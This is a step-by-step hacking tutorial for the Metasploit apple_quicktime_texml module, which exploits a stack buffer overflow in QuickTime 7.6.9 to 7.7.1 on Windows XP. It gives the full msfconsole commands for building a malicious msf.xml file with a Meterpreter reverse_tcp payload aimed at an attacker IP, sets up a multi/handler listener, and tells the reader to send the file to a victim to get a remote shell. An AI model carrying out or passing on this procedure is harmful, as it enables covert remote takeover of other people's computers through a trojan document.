This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. The flaw is generally known as a bug while processing the 'transform' attribute, however, that attack vector seems to only cause a Terminate Process call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the 'color' value instead, which accomplishes the same thing.
Exploit Targets
QuickTime 7.7.1 on Windows XP SP3
QuickTime 7.7.0 on Windows XP SP3
QuickTime 7.6.9 on Windows XP SP3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/apple_quicktime_texml
Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_texml)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3
Msf exploit (apple_quicktime_texml)>show targets
Msf exploit (apple_quicktime_texml)>set target 0
Msf exploit (apple_quicktime_texml)>exploit
After we successfully generate the malicious File, it will stored on your local computer
/root/.msf4/local/msf.xml
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.